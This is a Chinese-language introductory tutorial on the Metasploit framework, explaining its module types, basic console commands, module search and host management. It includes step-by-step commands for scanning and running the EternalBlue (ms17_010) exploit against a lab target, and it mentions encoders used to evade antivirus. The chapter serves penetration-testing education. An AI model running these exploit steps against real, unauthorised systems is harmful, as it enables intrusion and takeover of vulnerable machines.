第三章-1 MSF框架介紹與基本命令

本文內容：
		~.Metasploit框架介紹
		~.Metasploit模塊介紹
		~.基礎指令
		~.msf搜索應用
		~.msf主機管理

一.Metasploit框架介紹

1，簡介
		Metasploit是一個免費的、可下載的框架，通過它可以很容易地獲取、
		開發並對計算機軟件漏洞實施攻擊。它本身附帶數百個已知軟件漏洞的專業級漏洞攻擊工具
							//MSF有付費版本，kali自帶免費版
		
		個人評價：	簡單好用易上手，人人都可以容易得打出高危傷害
		
		額外說明：	其實互聯網中真正的大牛很少去惹事。
					而且事實恰恰相反，
					整個互聯網之中%80的“駭客行爲”往往都是這些腳本小子造成的
					
		總結：		給你一把鋒利的武器，一念成佛，一念成魔。且行且珍惜！

二.Metasploit模塊介紹

1，五大模塊
		
		Auxiliary 	輔助模塊	  		在滲透測試中幫助我們進行前期的信息收集、掃描測試等

		Exploits	攻擊模塊	  		對發現的已知漏洞，進行攻擊測試，從而獲得目標系統的權限

		Payload		攻擊載荷模塊		攻擊成功後的惡意代碼

		Post		後滲透攻擊模塊		在滲透測試成功後，進一步的收集目標系統的信息，爲進一步深入目標系統做準備

		Encoders    編碼模塊     		將攻擊代碼進行編碼，編譯，來繞過殺毒軟件的檢測

三.基礎指令

1，開啓MSF
		~開啓數據庫：			service postgresql start
		~初始化msf數據庫:		msfdb init				//第一次使用時，以後不在需要
		~開啓（進入）MSF:		msfconsole
		~查看數據連接狀態:		db_status
				
				問：怎麼纔算連接成功？
				答： 出現這樣的內容“	[*] Connected to msf. Connection type: postgresql.	”
				
				問：開啓MSF數據庫的作用是什麼？
				答：
					~我們知道MSF中有很多的模塊以及插件，
					~當我們開啓數據庫之後我們去搜索相關插件和模塊的速度會很大的提升，
					~並且數據庫中可以保存我們的操作記錄
					
2，常用指令
		help/?	       	幫助菜單

		exit			退出MSF控制檯

		Back       	 	返回上一級

		info			顯示一個或者多個模塊的信息

		show			顯示所給類型的模塊

		background 		將當前操作在後臺運行

		use 			使用所選擇的模塊

		set				設置選項
		
		unset			取消設置的選項

四.msf搜索應用

0，前言
		msf中有很多漏洞利用exp與payload。在實際場景中，
		如何快速找到我們想要的exp或者payload？
		這就涉及到了搜索功能。

1，根據名稱搜索 
		例如：search ms17_010
		
2，聯合搜索 
		例如：search name:ms17 type:auxiliary			//有點類似谷歌語法
		
		問：搜索到之後幹嘛？
		答：當然是利用該模塊，對靶機進行滲透測試了
		
				示例一：	
						~use auxiliary/scanner/smb/smb_ms17_010			選擇模塊
						
						~show options									查看選項（有選項是yes的需要設置）
						
						~set rhosts 192.168.177.129						設置選項（有的需要設置多個選項）
							
						~run											開始運行
						
				示例二：
						use exploit/windows/smb/ms17_010_eternalblue	選擇模塊
						
						info											查看詳細（和show options功能類似）
																		（選項是yes且爲true的一般也不用設置）
						
						options											再次查看詳細（檢查還需要設置什麼，或者有沒有設置成功）
						
						run												開始運行
									
						接着基本攻擊成功，可是試試，whoami，是不是最高權限

五.msf主機管理

	1，hosts命令：					
					通過該命令我們可以添加主機以及刪除主機等//已經攻擊成功的
							//詳細的可以 hosts -h查看
								
					例如：列出當前mac地址：hosts –c mac

六.其他知識補充：

	1，漏洞庫是什麼東西？
			漏洞庫是公開的漏洞檢索系統，例如，可以快速搜索漏洞
			http://www.cnnvd.org.cn/web/vulnerability/querylist.tag
			
	2，MSF中的模塊的作用是什麼？
			簡單說，MSF以模塊歸類各種工具（插件）
			每個模塊對應滲透測試流程中，不同的作業

	3，比如我的站點是wordpress，我該如何使用MSF進行測試？
			使用搜索命令：search wordpress ，找到相關的模塊以及插件然後進行測試。
			當然了，在測試之前建議使用漏洞掃描軟件，先掃描測試，根據掃描出來的結果，在進行手工複測
			
			擴展：wordpress是什麼？
						WordPress是使用PHP語言開發的博客平臺
						用戶可以在支持PHP和MySQL數據庫的服務器上架設屬於自己的網站
						也可以把 WordPress當作一個內容管理系統（CMS）來使用
	
	4，run命令和exploit命令有區別麼？
			沒有什麼區別，都是執行我們的模塊
			
	5，MSF掃描 IP的時候怎麼掃IP段
			我們在設置RHOSTS的時候，設置爲192.168.20.1/24，
			/24的意思是代表C段，IP地址爲0-254個主機
					不懂C端或者網絡基礎較差的同學
			可以看下網絡基礎：https://baike.baidu.com/item/子網劃分/5446046
	
	6，background 之後怎麼重新拿到前臺?
			使用命令：sessions -l，查看當前的會話有多少以及會話ID，
			使用session -i id值。就切換回來了。

	7， —help能顯示更多命令解釋嗎？
			是的，在msf的學習之中，我們要多用用 -h ，或者help幫助命令提示我們如何使用

	
	總結：
			本章內容就是介紹以下msf的基本情況，所以不會牽扯太多的東西。
			更多的內容後邊會一一介紹。